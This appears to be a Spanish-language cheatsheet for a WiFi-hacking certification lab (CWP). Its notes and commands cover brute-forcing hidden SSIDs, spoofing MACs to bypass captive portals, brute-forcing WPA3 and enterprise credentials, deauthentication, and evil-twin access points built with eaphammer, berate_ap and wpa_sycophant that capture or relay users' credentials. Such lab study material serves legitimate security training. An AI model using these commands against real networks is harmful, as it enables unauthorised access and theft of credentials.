👑CWP Cheatsheet

With love, eldeim

Redes Ocultas

  1. Escanear redes ocultas para encontrar su nombre. Esto lo hacemos con mk4 -->

## Conguracion del canal 11
iwconfig wlan0 channel 11
## Ataque de fuerza bruta
mdk4 wlan0 p -t F0:9F:C2:6A:88:26 -f /root/rockyou-top100000.txt

Suponiendo que es un wifi, filtro dentro del rocku por algo que empiece por "wifi" y repito el ataque. Descubriendo asi la el SSID de la wifi -->

cat /root/rockyou-top100000.txt | awk '{print "wifi-" $1}' > /root/wifi-rockyou.txt
LogoChallenges RECON | brain_fuckeldeim.gitbook.io

Redes OPN

  1. Es posible que la red OPN (de wifi abierta) tenga el nombre oculto, asi que tras encontrar el nombre, debemos conectarnos

  2. Probar contraseñas por defecto en el router/puerta de enlace

  3. Evadir portal cautivo cambiando nuestra MAC por la de otro cliente con macchanger (ejemplo en Capitulo 5.1, reto 6)

## Apagamos la interfaz wlan2 (interfaz en modo normal que no utiliza modo monitor)
ip link set wlan2 down
## Cambiamos la direccion MAC por uno de los clientes
macchanger -m 80:18:44:BF:72:47 wlan2
## Levantamos la interfaz
ip link set wlan2 up
## Paramos NetworkManager por posibles errores
systemctl stop network-manager.service
## Comprobamos MACs
macchanger wlan2

  1. Interceptar trafico en escucha con airodump-ng y capturar peticiones como; credenciales de acceso al router

LogoChallenges OPN | brain_fuckeldeim.gitbook.io

Redes WEP

  1. (Modo facil) - Utilizamos la herramienta automatizada Besside-ng, especificando el BSSID del AP para que haga el ataque de fuerza bruta al "PIN". Por ultimo nos conectamos

LogoChallenges WEP | brain_fuckeldeim.gitbook.io

Redes PSK - WPA/WPA2

  1. Escanear trafico de ese AP/BSSID para captura el handshake y crackear la contraseña

    1. Si es necesario, hacer ataques de des autentificación

  2. Si tenemos la contraseña de la wifi y el trafico capturado/handshake, podemos desencriptar el trafico con airdecap-ng para ver posible credenciales enviadas y/o cookies de sesion (Capitulo 5.4, challenge 9)

  3. Una vez dentro de la red, podemos comprobar si existe aislamiento entre clientes, lanzado un arp-scan y nmap para ver sus puertos y tambien si tienen webs corriendo

  4. Comprobar usuarios conectados a APs/BSSIDs imbisibles, pero con probes. Si existen, realizar un ataque NO AP con hostapd-mana para obtener su hash y crakear la password (Capitulo 5.4, challenge 12)

LogoChallenges PSK | brain_fuckeldeim.gitbook.io

Redes SAE - WPA3

  1. Realizar un ataque de fuerza online para internar conectarnos (Capitulo 5.5, challege 13)

iwlist wlan0 frequency | grep 'Channel 11 :'

Channel 11 : 2.462 GHz

./wacker.py --wordlist ~/rockyou-top100000.txt --ssid 'wifi-management' --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462

--interface : Hay que poner una interfaz de red que no este en modo monitor

  1. Si una red WPA3 tiene cliente, hace un ataque de Downgrade (Capitulo 5.5, challenge 14)

LogoChallenges SAE | brain_fuckeldeim.gitbook.io

Redes MGT

Recon MGT

  1. Obtener nombre de dominio de un cliente conectado a una red MGT. Podemos capturar su trafico con airodump-ng hasta ver a un cliente autentificarse con el AP/Capturar el handshake (este handshake no nos sirve para ningún ataque (por el tipo de red MGT que es)) Y ese trafico analizarlo con wireshark o wifi_db para obtener el nombre del dominio de ese cliente

  1. Obtener dirección de correo del certificado del servidor. En las redes MGT utilizan un certificado TLS para enviar las credenciales cifradas, asi que podemos utilizar la captura de airodump-ng anterior y usar pcapFilter

bash /root/tools/pcapFilter.sh -f /home/user/wifi/MGT/regi-01.cap -C | more

-C : para obtener la información de los certificados

| more : para mostrar por paginas

  1. Podemos comprobar que método EAP sorporta el AP con EAP_buster (Capitulo 5.6, challenge 17)

LogoChallenges RECON MGT | brain_fuckeldeim.gitbook.io

Attack MGT

  1. Al escanear el trafico con airodump-ng vemos usuarios, podemos crear un AP falso, para esto hay que crear un certificado TLS para el AP usando eaphammer (Capitulo 5.7, challenge 18)

Sacamos info del certf de sesion de esta wifi, utilizamos pcapFilter -->

bash /root/tools/pcapFilter.sh -C -f /home/user/wifi/MGT/wifi-global-01.cap

Ahora para general el certificado usamos eaphammer -->

Ahora que tenemos el certificado, levantamos el punto de acceso con eaphammer

python3 /root/tools/eaphammer/eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp

Ataque de des autentificación (es podible que el cliente quiera conectarse a dos redes diferentes, abra que tirarle de ambas)

  1. Si tenemos un usuario y dominio, ej:(CONTOSO\test), podemos hacer un ataque de fuerza bruta (Capitulo 5.7, challenge 19)

  1. Si tenemos una contraseña y dominio, podemos hacer un ataque de fuerza bruta para indentificar el usuario con air-hammer (Capitulo 5.7, challenge 20)

cat /root/top-usernames-shortlist.txt | awk '{print "CONTOSO\\" $1}' > /home/user/wifi/MGT/top-users-CONTOSO.txt
/root/tools/air-hammer/air-hammer.py -i wlan1 -e wifi-corp -P 12345678 -u /home/user/wifi/MGT/top-users-CONTOSO.txt

  1. Podemos crear un AP falso con su mismo nombre y MAC, y asi des autentificar a los usaurio conectados al AP real y si conecten al nuestro, dando credenciales (Capitulo 5.7, challenge 21)

  1. Si al crear un AP falso y hacer el ataque, el cliente verifica la CA podemos levantar un AP falso manteniendo el wpa_sycopham a la red wifi-regional. Asi que un cliente se nos conecta al AP falso y reenviamos sus credenciales (Capitulo 5.7, challenge 22)

Levanatamos el AP de wifi-regional-tables

/root/tools/berate_ap/berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log wlan1 lo wifi-regional-tablets

Manemos el wpa_sycophant a la wifi-regional original -->

./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan3

Y por ultimo el ataque des autentificaon se hace contra un cliente de wiif-regiona-tables (como en el challenges anterior)(reuitlizo ese comando) -->

aireplay-ng -0 0 wlan0 -a F0:9F:C2:7A:33:28 -c 64:32:A8:A9:DE:55

  1. Si el AP MGT solo soporta autenticación con certificados, significa que no podemos atacar directamente esa comunicación, pero si capturar el trafico con airodump-ng y ver mas información usando wifi_db podemos ver sus probes. Si tiene probes de wifi abierta OPN, podemos hacer la desconexión del AP real con el AP legitimo, de este modo el cliente se nos conecta a nuestro AP falso y desde un portal cautivo, le pedimos user and password y se las robamos (Capitulo 5.7, challenge 23)

  1. Si tenemos la clave privada de la CA y un certificado del servidor, podemos levantar un AP falso con ese certificado y asi conseguir que esos usuario que si verifican el CA, puedan conectarse a nuestro AP falso y nos den sus credenciales (Capitulo 5.7, challenge 25)

  1. Si tenemos el .key del cliente y la CA podemos generar un certificado de cliente con openssl y asi con este conectarnos directamente al AP (Capitulo 5.7, challenge 26)

LogoChallenges MGT | brain_fuckeldeim.gitbook.io
PreviousCWP-Certified WiFiChallenge ProfessionalNextCapitulo 1: Teoría de redes Wi-Fi

Last updated